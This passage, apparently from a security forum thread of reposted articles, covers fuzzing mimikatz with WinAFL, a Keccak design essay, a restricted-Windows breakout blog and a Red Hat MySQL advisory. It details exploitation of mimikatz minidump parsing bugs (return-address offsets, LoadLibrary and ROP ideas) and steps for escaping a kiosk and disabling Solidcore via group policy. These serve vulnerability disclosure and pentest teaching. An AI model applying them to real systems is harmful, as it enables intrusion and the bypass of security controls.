core home system (4 cores for private stuff). Three days later I had 28 unique crashes identified by WinDbg. My analysis scripts reduced them to 4 unique bugs in code (the 28 crashes are just variations of the same 4 bugs in the code). Execution speed was approximately 2 exec/sec per job, therefore 16 exec/sec in total on all cores (which is really slow). The first exploitable bug from the next chapter was found after 3 hours, the second exploitable bug was not found at all with this approach. I also modified WinAFL to fuzz only the heatmap bytes. My first approach was to use the “post_handler” which can be used for test-case post-processing (e.g. fixing checksums, however, it’s better to remove the checksum verification code from the target application). Since this handler is not called for dry-runs (the first executions from AFL) this will not work. Instead, write_to_testcase() can be modified. Inside the main function I copy the full memory dump to a heap buffer. In the input directory I stored a file containing only the heatmap bytes and therefore the file size is much smaller like 91KB or 3KB. Next I added code to write_to_testcase where I copy all bytes from the input file over the heap buffer at the correct positions. Therefore, AFL only sees the small files but passes the correct memory dumps to mimikatz. This approach has a little drawback though. As soon as one queue entry has a different size, fuzzing could become ineffective, but for this PoC it was enough. Later I’m going to invoke the heatmap calculation for every queue entry if a heuristic detects this as more efficient. Please also bear in mind that AFL and WinAFL write every testcase to disk. This means we have to write a 27 MB file per execution (also per in-memory execution like a simple bit flip!!). From performance perspective it would be way better if we modify the testcase inside the target application in-memory (we already do in-memory fuzzing and therefore this is possible). Then we can also skip all the process-switches from WinAFL to the target application and back and then we really get the benefit of in-memory fuzzing! We can do this by injecting the AFL code (or even python code… into the target application, an area on which I’m also currently working on. Here is a screenshot of my WinAFL output (running on a RAMDisk): Look at the different stats of the fuzzer. What do you see? Is this type of fuzzing good or not? Should we stop or continue? Here is the same screenshot with some colored boxes: First the good thing: We already identified 16 unique crashes and a total of 137 unique paths (inputs which result in unique coverage; see the green area). Now the bad: Fuzzing speed is only 13 exec / sec (blue) which is extremly slow for AFL (but much faster than the self-written fuzzer which had 2 exec/sec per core). And now the really bad stuff: We are running for 14,5 hours and it didn’t finish the bitflip 1/1 stage yet for the first input file (and 136 others are in queue). You can see this in the red area because we just finished 97% of this stage. And after that 2/1 and 4/1 must be executed, then byte flips, arithmetics and so on. So we can see that continuing will not be very efficient. For demonstration I kept the fuzzer running, but modified my WinAppDbg script to filter better and started a new fuzzing job. The new WinAppDbg script reduced the number of “hot bytes” to 3KB (first we had 27 MB, then we had 91KB and now we just have 3KB to fuzz). This was possible because the new script does not count hits from search or copy functions, but also log access attempts from copied memory regions. This WinAppDbg script was approximatly 800 LoC (because I have to follow copies which go to heap and stack variables and I have to disable logging when the variables are freed). Here is a screenshot of the above job (with the “big” 91KB input files) after 2 days and 7 hours: We can see that the fuzzer finished bitflip 1/1 and 2/1 and is now inside 4/1 (with 98% finished). You can also see that the bitflip 1/1 strategy required 737k executions and 159 of these 737k executions resulted in new coverage (or crashes). Same for 2/1 where the stats are 29/737k. And we found 22 unique crashes in 2 days and 7 hours. And now the fuzzing of the smaller 3KB files after 2 hours: We can see that we already have 30 unique crashes after 2 hours! (Compare this with only 22 crashes after 2 days and 7 hours with the 91KB file!) We can also see that for example the bitflip 1/1 stage only required 17.9k executions (instead of 737k) because of the reduced input file size. Moreover, we can see that we found 245 unique paths and this with just 103k total executions (compared to 184 unique paths with 2.17 million executions from the 91KB test input). And now consider how long it would have taken us to fuzz the full 27MB file (!!) and what results we would have seen after some days of fuzzing. Now you should understand the importance of the input file size. Here is one more demonstration of the different input file sizes. The following animated image (created via Veles https://github.com/wapiflapi/veles) shows a visualization of the 27 MB original minidump file: And now the 27 MB minidump file where all unimportant (not read) bytes are replaced with 0x00 so we only see the 3 KB bytes which we fuzz with WinAFL; you maybe have to zoom in to see them. Look at the intersection of the 3 coordinate axes. However, in my opinion even the 3KB fuzzing job is too slow / inefficient. If we can start the job on multiple cores and let it run over one or two weeks, we should get into deeper levels and the result should be OK. But why are we even so slow? Why do we only have an execution speed of 13 or 16 exec / sec? Later queue entries will result in faster execution speeds because mimikatz will not execute the full code because the inputs trigger error-conditions (which result in execution speeds like 60 exec / sec). But on Linux we often deal with execution speeds of several thousand executions per second. A major point is that we have to load and search a 27MB file with every execution, so reducing this file size could really be a good idea (but requires lots of manual work). On the other hand, we can compare the execution speeds of different setups: Execution speed with WinAFL in syzygy mode: ~13 exec / sec Native execution speed without WinAFL and without instrumentation (in-memory): ~335 exec / sec Execution without WinAFL but with instrumented (syzygy) binary: ~50 exec / sec Execution of native binary (Instrumentation via DynamoRio drcov): ~163 exec / sec So we can see that syzygy instrumentation results in a slow-down factor of approximatly 6. And syzygy+WinAFL a factor of approximatly 25. This is mainly because of the process switches and file writes / reads because we are not doing full in-memory fuzzing, but there is also another big problem! We can see that instrumentation via DynamoRio is faster than syzygy (163 exec/sec vs. 50 exec/sec) and we can also start WinAFL with the DynamoRio mode (which does not require source code at all). If we do this, we get an execution speed of 0,05 – 2 exec/sec with WinAFL. At this point you should recognize that something is not working correctly because DynamoRio mode should be much faster! The reason can be found in our modification of the kull_m_sekurlsa_all() function. I added the two code lines kuhl_m_sekurlsa_reset() and pMinidumpName = argv[1] at the start because this is exactly what the “sekurlsa::minidump” command is doing. What I wanted to achieve is to immediatly execute the “sekurlsa::minidump” command and after that the “sekurlsa::logonpasswords” command and that’s why I used this sequence of code calls. However, this is a huge problem because we exit the function (DynamoRio mode) or the __afl_persistent_loop (syzygy mode) with a state where the input file is still open! This is because we call the kuhl_m_sekurlsa_reset() function at the start of the function and not at the end! That means that we only execute one “execution” in-memory, then WinAFL tries to modify the input file, detects that the file is still open and can’t be written to and then terminates the running process (via TerminateProcess from afl-fuzz.c:2186 in syzygy mode or nudges in DynamoRio mode from afl-fuzz.c:2195) to write to the file. Therefore, we do not do real in-memory fuzzing because we execute the application one time and then the application must be closed and restarted to write the next test case. That’s why the DynamoRio mode is so slow because the application must be started again for every testcase which means the application must be instrumented again and again (DynamoRio is a dynamic instrumentation framework). And because syzygy instrumented statically it’s not affected so heavily by this flaw (it still has to restart the application, but does not have to instrument again). Let’s fix the problem by reordering kuhl_m_sekurlsa_reset() to the end of the function: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { pMinidumpName = argv[1]; kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); kuhl_m_sekurlsa_reset(); } Return NT_SUCCESS; } If we execute this, we still face the same problem. The reason is a bug inside mimikatz in the kuhl_m_sekurlsa_reset() function. Mimikatz opens the input file via three calls: CreateFile CreateFileMapping MapViewOfFile Therefore, we have to close all these three handles / mappings. However, mimikatz fails at closing the CreateFile handle. Here is the important code from kuhl_m_sekurlsa_reset() case KULL_M_MEMORY_TYPE_PROCESS_DMP: toClose = cLsass.hLsassMem->pHandleProcessDmp->hMinidump; break; ... } cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem); CloseHandle(toClose); Kull_m_memory_close() correctly closes the file mapping, but the last CloseHandle(toClose) call should close the handle received from CreateFile. However, toClose stores a heap address from (kull_m_minidump_open()): *hMinidump = (PKULL_M_MINIDUMP_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_MINIDUMP_HANDLE)); That means the code calls CloseHandle on a heap address and never calls CloseHandle on the original file handle (which gets never stored). After fixing this issue it starts to work and WinAFL gets 30-50 exec / sec! However, these executions are very inconsistent, sometimes drop down to under 1 execution per second (when the application must be restarted like after crashes). Because of this we got overall better fuzzing performance with the syzygy mode (which now has a speed of ~25 exec / sec) which also uses edge coverage. Screenshot of WinAFL DynamoRio mode (please bear in mind that the default mode is basic block coverage and not edge coverage with DynamoRio): Screenshot of WinAFL syzygy mode: Even if DynamoRio mode has a higher execution speed (29.91 exec / sec vs. 24.02 exec / sec) it’s in total slower because the execution speed is inconsistent. We can see this because DynamoRio mode is running since 25 minutes and just got total executions of 13.9k and syzygy mode just runs for 13 minutes but already got 16.6k executions. We can see that currently it’s more efficent to fuzz with syzygy mode if source code is available (especially if the target application crashes very often). And also very important: We had a bug in the code which slowed down the fuzzing process (at least by a factor of 2) and we didn’t see it during syzygy fuzzing! (A status screen entry with in-memory executions vs application restarts would be a great feature!) Please also note that the WinAFL documentation explicitly mentions this in the “How to select a target function” chapter: Close the input file. This is important because if the input file is not closed WinAFL won’t be able to rewrite it. Return normally (So that WinAFL can “catch” this return and redirect execution. “returning” via ExitProcess() and such won’t work) The second point is also very important. If an error condition triggers code which calls ExitProcess during fuzzing, we also end up starting the application again and again (and do not get the benefit of in-memory fuzzing). This is no problem with mimikatz. However, mimikatz crashes very often (e.g. 1697 times out of 16600 executions) and with every crash we have to restart the application. This mainly affects the performance of the DynamoRio mode because of the dynamic instrumentation and then it’s better to use the syzygy mode. Please also note that we can “fix” this by storing the stack pointer in the pre-fuzzing-handler of DynamoRio, implementing a crash handler where we restore the stack and instruction pointer, free the file mappings and handles and just continue fuzzing as if nothing had happend. Memory leaks can also be handled by hooking and replacing the heap implementation to free all allocations from the fuzzing-loop. Only global variables could become a probem, but this discussion goes too far here. At the end I started a fuzzing job with syzygy mode, one master (deterministic fuzzing) and 7 slaves (non-deterministic fuzzing) and let it run for 3 days (plus one day with page heap). In total I identified ~130 unique AFL crash signatures, which can be reduced to 42 unique WinDbg crash signatures. Most of them are not security-relevant, however, two crashes are critical. PRACTICE: ANALYSIS OF THE IDENTIFIED CRASHES Vulnerability 1: Arbitrary partial relative stack overwrites In this chapter I only want to describe the two critical crashes in depth. After fuzzing I had several unique crashes (based on the callstack of the crash) which I sorted with a simple self-written heuristic. From this list of crashes I took the first one (the one where I thought it’s the most likely to be exploitable) and analysed it. Here are the exact steps: This is the code with the vulnerability: The variable “myDir” is completly under our control. myDir points into our memory dump, we can therefore control all content of this struct. You maybe want to find the problem yourself before continuing, here are some hints: The argument length is always 0x40 (64) which is exactly the length of the destination argument buffer The argument source is also under our full control Obviously we want to reach RtlCopyMemory() from line 29 with some malicious arguments Now try to think how we can exploit this. My thoughts Step-by-Step: I want to reach line 29 (RtlCopyMemory() and therefore the IF statement from line 9-13 must be true. We can exploit the situation if “lengthToRead” (size argument) from the RtlCopyMemory call is bigger than 0x40 or if offsetToWrite is bigger than 0x40. The second case would be better for us because such relative writes are extremely powerful (e.g. just partially overwriting return addresses to bypass ASLR or to skip stack cookies and so on). So I decided to try exactly this, somehow control “offsetToWrite” which is only set in line 18 and 23. Line 23 is bad because it sets it to zero, so we take line 18. Since we want to come to line 18, the IF statement from line 15 must become true. First condition: Source < memory64→StartOfMemory This is no problem because we control both values completely. So far, so simple. Now lets check the first IF statement (line 9-13). One of the three conditions (line 10, 11 or 12) must evaluate to true. Lets focus on line 12 because from the IF from line 15 we know that Source < memory64→StartOfMemory must be true which is exactly what the first check is here for. So this one is true. That means we only have to ensure the second check: Second condition: Source + Length > (memory64→StartOfMemoryRange + memory64→DataSize) I leave this condition for one moment and think about line 25-27. What I want in RtlCopyMemory is to get as much control as possible. That means I want to control the target address (if possible, relative to an address to deal with ASLR), the source address to point into my own buffer and the size – that would really be great. The size is exactly lengthToRead and this variable can be set via line 25 and 27. 25 would be a bad choice because Length is fixed and offsetToWrite is already “used” to control the target address. So we must come to line 27. OffsetToRead is always zero because of line 17 and therefore memory64→DataSize completly controls lengthToRead. Now we can fix the next value and say that we want memory64→DataSize to be always 1 (to make 1-byte partial overwrites; or we set it to 4 / 8 to control full addresses). Now we are ready and take the second condition and fill in the known values. What we get is: Second condition: Source + 0x40 > (memory64→StartOfMemoryRange + 1) This check (together with the first condition) is exactly the check which should ensure that dataSize (the number of bytes which we write) is within the size of the buffer (0x40). However, we can force an integer overflow :). We can just set memory64→StartOfMemoryRange to 0xffffffffffffffff and therefore we survive the check because after adding one to it we get zero and that means Source + 0x40 is always bigger than zero (If we don’t overflow source+0x40). At the same time we survive the first condition because source will be smaller than 0xffffffffffffffff. Now we can also control offsetToWrite via line 18: offsetToWrite = 0xffffffffffffffff – source You might think that we can’t fully control offsetToWrite because the source variable is on x86 mimikatz just 32-bit (and the 0xffff… is 64-bit), however, because of integer truncation the upper 32-bit will be removed and therefore we can really address any byte in the address space relative to the destination buffer (on x64 mimikatz it’s 64-bit and therefore it’s also no problem). This is an extremely powerful primitive! We can overwrite bytes on the stack via relative offsets (ASLR is no obstacle here), we have full control over the size of the write-operation and full control over the values! The code can also be triggered multiple times (loop at line 7 is not useful because the destination pointer is not incremented) via loops which call this function (with some limitations). The next question is what offset do we use? Since we write relative to a stack variable we are going to target a return address. The destination variable is passed as argument inside the kull_m_process_ntheaders() function and this is exactly where we place a breakpoint on the first kull_m_memory_copy() call. Then we can extract the “destination” argument address and the address where the return address is stored and subtract them. What we get is the required offset to overwrite the return address. For reference, here are the offsets which I used for my dump file (dump files from other operating systems require very likely different offsets). Offset 0x6B4 stores the “source” variable. I use 0xffffff9c here because this is exactly the correct offset from “destination” to “return address” on the current release version of mimikatz (mimikatz 2.1.1 from Aug 13 2017; However, this offset should also work for older versions!). Offset 0xF0 stores the “myDir” struct content. The first 8 bytes store the NumberOfMemoryRanges (this controls the number of loops and therefore how often we can write). Since we just want to demonstrate the vulnerability we set it to one to make exactly one write operation (overwrite the return address). The next 8 bytes are the BaseRVA. This value controls “ptr” in line 6 which is the source from where we copy stuff. So we have to store there the relative offset in our dump file where we store the new return address (which should overwrite the original one). I’am using the value 0x90 here but we can use any value. It’s only important that we store the new return address at that offset (in my case offset 0x90) then. I therefore wrote 0x41414141 to offset 0x90. The next 8 bytes control the “StartOfMemoryRange” variable. I originally used 0xffffffffffffffff (like in the above example), however, for demonstration purpose I wanted to overwrite 4 bytes of the return address (and not only 1) and therefore had to subtract 4 (the DataSize, check the second condition in line 12). The next 8 bytes control the “DataSize” and as already explained I set this to 4 to write 4 bytes. Here is the file: Hint: In the above figure the malicious bytes start at offset 0xF0. This offset can differ in your minidump file. If we check the byte at 0x0C (= 0x20) we can see that this is the offset to the “streams” directory. Therefore, the above minidump has a streams directory starting at offset 0x20. Every entry there consists of 3 DWORDS (on x86), the first is the type and the last is the offset. We search for the entry with type 0x09 (=Memory64ListStream). This can be found in our figure at offset 0x50. If we take the 3rd DWORD from there we can see that this is exactly 0xF0 – the offset where our malicious bytes start. If this offset is different in your minidump file you may want to patch it first. And here is the proof that we really have control over the return address: Please note that full exploitation is still tricky because we have to find a way around ASLR. Because of DEP our data is marked as not executable, therefore we can’t jump into shellcode. The default bypass technique is to apply ROP which means that we instead invoke already existing code. However, because of ASLR this code is always loaded at randomized addresses. And here is what we can do with the above vulnerability is: We can make a relative write on the stack which means we can overwrite the return address (or arguments or local variables like loop counters or destination pointers). Because of the relative write we can bypass stack ASLR. Next we can choose the size of the write operation which means we can make a partial overwrite. We can therefore overwrite only the two lower bytes of the return address which means we can bypass module level ASLR (These two conditions make the vulnerability so useful). We can check the ranges which we can reach by checking the call-stack to the vulnerable code (every return address on this stack trace can be targeted via a partial overwrite) and we have multiple paths to come to the vulnerable code (and therefore different call-stacks with different ranges; We can even create more different call-stacks by overwriting a return address with an address which creates another call-stack to the vulnerable code). For example, a simple exploit could be to overwrite one of the return addresses with the address of code which calls LoadLibraryA() (e.g. 0x455DF3 which is in range) or LoadLibraryW (e.g. 0x442145). The address must be chosen in a way that the function argument is a pointer to the stack because then we can use the vulnerability to write the target path (UNC Path to a malicious library) to this address on the stack. Next, this exploit could be extended to first call kull_m_file_writeData() to write a library to the file system which gets later loaded via LoadLibrary (this way UNC paths are not required for exploitation). Another idea would be to make a specific write which exchanges the destination and source arguments from the vulnerable code. Then the first write operations can be used to write the upper bytes of return addresses (which are randomized by ASLR) to the memory dump buffer. After that these bytes can be written back to the stack (with the vulnerability) and full ROP chains can be built because we can now write ROP gadget addresses after each other. Without this idea we cannot execute multiple ROP gadgets after each other because they are not stored adjacent on the stack (return addresses are not stored next to each other on stack because there is other memory stored there like arguments, local variables and so on). However, I believe that this exploitation scenario is much more difficult because it requires multiple writes (which must be sorted to surive all checks in the mimikatz code), so the first approach with LoadLibrary should be more simple to implement. Vulnerability 2: Heap overflow The major cause of the second vulnerability can be found inside kull_m_process_getUnicodeString(). The first parameter (string) is a structure with the fields buffer (data pointer), a maximum length of bytes the string can hold and the length (currently stored characters). The content is completely under attacker control because it is parsed from the minidump. Moreover, the source (the second argument) also points to the minidump (attacker controlled). Mimikatz always extracts the string structure from the minidump and calls after that kull_m_process_getUnicodeString() to fill string->buffer with the real string from the minidump. Can you spot the problem? Line 9 allocates space for string->MaximumLength bytes and after that it copies exactly the same number of bytes from the minidump to the heap (line 11). However, the code never checks string->Length and therefore string->Length can be bigger than string->MaximumLength because this value is retrieved from the minidump. If later code uses string->Length a heap overflow can occur. This is for example the case when MSV1.0 (dpapi) credentials are stored in the minidump. Then mimikatz uses the string as input (and output) inside the decryption function in kuhl_m_sekurlsa_nt6_LsaEncryptMemory() and the manipulated length value leads to a heap overflow (however, the MSV1.0 execution path is not trivial/possible to exploit in my opinion, but there are many other paths which use kull_m_process_getUnicodeString()). Vulnerabilities patch status At time of publication (2017-09-22) there is no fix available for mimikatz. I informed the author on 2017-08-26 about the problems and received on 2017-08-28 a very friendly answer, that he will fix the flaws if it does not expand the code base too much. He also pointed out that mimikatz was developed as a proof-of-concept and it could be more secure by using a higher level language on which I totally agree on. On 2017-08-28 I sent the SMIME encrypted vulnerability details (together with this blog post). Since I didn’t receive answers on further emails or twitter messages, I informed him on 2017-09-06 about the blog post release on 2017-09-21. If you are a security consultant and using mimikatz in minidump mode, make sure to only use it inside a special mimikatz-virtual machine which is not connected to the internet/intranet and does not store important information (I hope you are already doing this anyway). To further mitigate the risk (e.g. a VM escape) I recommend to fix the above mentioned vulnerabilities. THEORY: RECOMMENDED FUZZING WORKFLOW In this last chapter, I want to quickly summarize the fuzzing workflow which I recommend: Download as many input files as possible. Calculate a minset of input files which still trigger the full code/edge coverage (corpus distillation). Use a Bloom-Filter for fast detection of different coverage. Minimize the file size of all input files in the minset. For the generated minset, calculate the code coverage (no Bloom-Filter). Now we can statically add breakpoints (byte 0xCC) at all basic blocks which were not hit yet. This modified application can be started with all files from the input and should not crash. However, we can continue downloading more files from the internet and start the modified binary (or just fuzz it). As soon as the application crashes (and our Just-in-Time configured compiler script kicks in) we know that a new code path was taken. Using this approach, we can achieve native execution speed but extract the information about new coverage! (downside: Checksums from files break; Moreover, a fork-server should also be used.) During fuzzing I recommend extraction of edge coverage (which requires instrumentation) and therefore we should fuzz with instrumentation (and sanitizers / heap libraries). For every input, we conduct an analysis phase before fuzzing. This analysis phase does the following: First identify the common code which gets executed for most inputs (for this we had to log the code coverage without the bloom-filter). Then get the code coverage for the current input and subtract the common code coverage from it. What we get is the code coverage which makes this fuzzing input “important” (code which only gets executed for this input). Next, we start our heatmap analysis but we just log the read operations conducted by this “important code”! What we get from this are the bytes which make our input “important”. Now we don’t have to fuzz the full input file, nor we have to fuzz the bytes which are read by the application, instead we only have to fuzz the few bytes which make the file “special”! I recommend focusing on these “special” bytes but also fuzz the other bytes afterwards (Fuzzing the special bytes fuzzes the new code, fuzzing all bytes fuzzes the old code with the new state resulting from the new code). Moreover, we can add additional slow checks which must be done only once for a new input (e.g. log all heap allocations and check for dangling-pointers after a free-operation; similar concept to Edge’s MemGC). Of course, some additional feedback and symbolic execution. Want to learn more about fuzzing? Come to one of my fuzzing talks (heise devSec or IT-SeCX for fuzzing applications with source code available and DefCamp for fuzzing closed-source applications!) or just follow me on Twitter. Sursa: https://www.sec-consult.com/en/blog/2017/09/hack-the-hacker-fuzzing-mimikatz-on-windows-with-winafl-heatmaps-0day/index.html
      • 2
      • Upvote
  15. Metasploit Low Level View Saad Talaat (saadtalaat@gmail.com) @Sa3dtalaat Abstract: for the past decade (almost) Metasploit have been number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key-point of this paper is to discuss metasploit framework as a code injector and payload encoder. Another key-point of this paper is malware different forms and how to avoid anti-viruses which have been a pain for pentesters lately. And how exactly anti-malware software work. Download: https://www.exploit-db.com/docs/18532.pdf
      • 1
      • Like
  16. Why Keccak is not ARX If SHA-2 is not broken, why would one switch to SHA-3 and not just stay with SHA-2? There are several arguments why Keccak/SHA-3 is a better choice than SHA-2. In this post, we come back on a particular design choice of Keccak and explain why Keccak is not ARX, unlike SHA-2. We specified Keccak at the bit-level using only transpositions, bit-level additions and multiplications (in GF(2)). We arranged these operations to allow efficient software implementations using fixed sequences of bitwise Boolean instructions and (cyclic) shifts. In contrast, many designers specify their primitives directly in pseudocode similarly including bitwise Boolean instructions and (cyclic) shifts, but on top of that also additions. These additions are modulo 2n with n a popular CPU word length such as 8, 32 or 64. Such primitives are dubbed ARX that stands for “addition, rotation and exclusive-or (XOR)”. The ARX approach is widespread and adopted by popular designs MD4, MD5, SHA-1, SHA-2, Salsa, ChaCha, Blake(2) and Skein. So why isn't Keccak following the ARX road? We give some arguments in the following paragraphs. ARX is fast! It is! Is it? One of the main selling points of ARX is its efficiency in software: Addition, rotation and XOR usually only take a single CPU cycle. For addition, this is not trivial because the carry bits may need to propagate from the least to the most significant bit of a word. Processor vendors have gone through huge efforts to make additions fast, and ARX primitives take advantage of this in a smart way. When trying to speed up ARX primitives by using dedicated hardware, not so much can be gained, unlike in bit-oriented primitives as Keccak. Furthermore, the designer of an adder must choose between complexity (area, consumption) or gate delay (latency): It is either compact or fast, but not at the same time. A bitwise Boolean XOR (or AND, OR, NOT) does not have this trade-off: It simply take a single XOR per bit and has a gate delay of a single binary XOR (or AND, OR, NOT) circuit. So the inherent computational cost of additions is a factor 3 to 5 higher than that of bitwise Boolean operations. But even software ARX gets into trouble when protection against power or electromagnetic analysis is a threat. Effective protection at primitive level requires masking, namely, where each sensitive variable is represented as the sum of two (or more) shares and where the operations are performed on the shares separately. For bitwise Boolean operations and (cyclic) shifts, this sum must be understood bitwise (XOR), and for addition the sum must be modulo 2n. The trouble is that ARX primitives require many computationally intensive conversions between the two types of masking. ARX is secure! It is! Is it? The cryptographic strength of ARX comes from the fact that addition is not associative with rotation or XOR. However, it is very hard to estimate the security of such primitives. We give some examples to illustrate this. For MD5, it took almost 15 years to be broken while the collision attacks that have finally been found can be mounted almost by hand. For SHA-1, it took 10 years to convert the theoretical attacks of around 2006 into a real collision. More recently, at the FSE 2017 conference in Tokyo, some attacks on Salsa and ChaCha were presented, which in retrospect look trivial but that remained undiscovered for many years. Nowadays, when a new cryptographic primitive is published, one expects arguments on why it would provide resistance against differential and linear cryptanalysis. Evaluating this resistance implies investigating propagation of difference patterns and linear masks through the round function. In ARX designs, the mere description of such difference propagation is complicated, and the study of linear mask propagation has only barely started, more than 25 years after the publication of MD5. A probable reason for this is that (crypt)analyzing ARX, despite its merits, is relatively unrewarding in terms of scientific publications: It does not lend itself to a clean mathematical description and usually amounts to hard and ad-hoc programming work. A substantial part of the cryptographic community is therefore reluctant to spend their time trying to cryptanalyze ARX designs. We feel that the cryptanalysis of more structured designs such as Rijndael/AES or Keccak/SHA-3 leads to publications that provide more insight. ARX is serious! It is! Is it? But if ARX is really so bad, why are there so many primitives from prominent cryptographers using it? Actually, the most recent hash function in Ronald L. Rivest's MD series, the SHA-3 candidate MD6, made use of only bitwise Boolean instructions and shifts. More recently, a large team including Salsa and ChaCha designer Daniel J. Bernstein published the non-ARX permutation Gimli. Gimli in turn refers to NORX for its design approach, a CAESAR candidate proposed by a team including Jean-Philippe Aumasson and whose name stems from a rather explicit “NO(T A)RX”. Actually, they are moving in the direction where Keccak and its predecessors (e.g., RadioGatún, Noekeon, BaseKing) always were. So, maybe better skip ARX? Sursa: https://keccak.team/2017/not_arx.html
  17. Breaking out of Restricted Windows Environment ON JUNE 14, 2017 BY WEIRDGIRL Many organizations these days use restricted windows environment to reduce the surface of vulnerability. The more the system is hardened the less the functionalities are exposed. I recently ran across such a scenario, where an already hardened system was protected by McAfee Solidcore. Solidcore was preventing users from making any changes to the system like installing/un-installing softwares, running executables, launching applications etc. The system (Windows 7) which I was testing, boots right on to the application login screen while restricting access to other OS functionalities. I could not do anything with that system except for restarting it. I spent a whole week in gathering information about the application and the system, which includes social engineering as well And then I got an entry point to start with. The credentials to login to the application(that gave me headache for one week) was available on Internet (thanks to Google dork). The credential I got was admin credential. After logging in to the application there was no way to get out of the application and get in to the base system. The application was so well designed that there was not a single way to get out of it. Then I found an option in the application to print some document. Then clicked on print-->printer settings-->add a printer-->location-->browse location and I got access to file browser of host machine. Every windows file explorer has a windows help option which provides free help about windows features. It was possible to open command prompt from the help option. I was only able to open command prompt but not any other windows application. Even after getting access to command prompt I was unable to do any changes in the system(not even opening a notepad). Every windows application that I tried to open, ended up with the following error message: The error was very clear that the application is blocked and it can either be enabled from registry editor or group policy editor. However I did not have access to both of them. Solidcore was blocking access to any of those. So I used the following batch script to enable task manager. The script was used to modify the registry key(though I didn’t have any idea if it was actually blocked from registry editor or group policy editor): And to my surprise I was able to unlock task manager. Similarly I was able to unlock and open control panel. My main objective was to disable or uninstall Solidcore as it was restricting the desktop environment. But then the system kept on giving me challenges. I was able to uninstall any software except for Solidcore. Then there was only one way left to disable Solidcore / enable installation of other software and that was “Group Policy Editor“. However I didn’t have direct access to gpedit. I used the following way to get access to gpedit: Open Task manager-->File -->New task-->Type MMC and enter This opened Microsoft Management Policy In mmc File-->Add/Remove snap-in--> Select Group Policy Objects and click on add After this I was able to perform numerous actions like enabling blocked system applications, allowing access to Desktop, disabling windows restrictions etc. However my main objective was to disable Solidcore and find out a way to run any windows executable. Group Policy editor provides an option to run/block only allowed windows software. And this policy can be set in the following way: Group Policy editor-->User Configuration > Administrative Templates > System On the right side there's option "Do not run specified windows applications". Click on that: Edit-->Select Enabled-->Click on show list of disallowed applications--> then add the application name that you want to block(in my case it was solidcore). Then click "Ok" . To apply changes I restarted my system. In the same way it was possible to enable list of allowed applications that can run in windows(a malicious software as well). And that’s how I was able to break out of a completely restricted desktop environment Sursa: https://weirdgirlweb.wordpress.com/2017/06/14/first-blog-post/
      • 2
      • Upvote
      • Thanks
  18. [RHSA-2017:2787-01] Important: rh-mysql56-mysql security and bug fix update From: "Security announcements for all Red Hat products and services." <rhsa-announce@xxxxxxxxxx> To: rhsa-announce@xxxxxxxxxx Date: Thu, 21 Sep 2017 03:43:23 -0400 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: rh-mysql56-mysql security and bug fix update Advisory ID: RHSA-2017:2787-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:2787 Issue date: 2017-09-21 CVE Names: CVE-2016-5483 CVE-2016-8327 CVE-2017-3238 CVE-2017-3244 CVE-2017-3257 CVE-2017-3258 CVE-2017-3265 CVE-2017-3273 CVE-2017-3291 CVE-2017-3302 CVE-2017-3305 CVE-2017-3308 CVE-2017-3309 CVE-2017-3312 CVE-2017-3313 CVE-2017-3317 CVE-2017-3318 CVE-2017-3450 CVE-2017-3452 CVE-2017-3453 CVE-2017-3456 CVE-2017-3461 CVE-2017-3462 CVE-2017-3463 CVE-2017-3464 CVE-2017-3599 CVE-2017-3600 CVE-2017-3633 CVE-2017-3634 CVE-2017-3636 CVE-2017-3641 CVE-2017-3647 CVE-2017-3648 CVE-2017-3649 CVE-2017-3651 CVE-2017-3652 CVE-2017-3653 ===================================================================== 1. Summary: An update for rh-mysql56-mysql is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64 3. Description: MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs. The following packages have been upgraded to a later upstream version: rh-mysql56-mysql (5.6.37). Security Fix(es): * An integer overflow flaw leading to a buffer overflow was found in the way MySQL parsed connection handshake packets. An unauthenticated remote attacker with access to the MySQL port could use this flaw to crash the mysqld daemon. (CVE-2017-3599) * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * It was discovered that the MySQL client command line tools only checked after authentication whether server supported SSL. A man-in-the-middle attacker could use this flaw to hijack client's authentication to the server even if the client was configured to require SSL connection. (CVE-2017-3305) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages listed in the References section. (CVE-2016-8327, CVE-2017-3238, CVE-2017-3244, CVE-2017-3257, CVE-2017-3258, CVE-2017-3273, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3450, CVE-2017-3452, CVE-2017-3453, CVE-2017-3456, CVE-2017-3461, CVE-2017-3462, 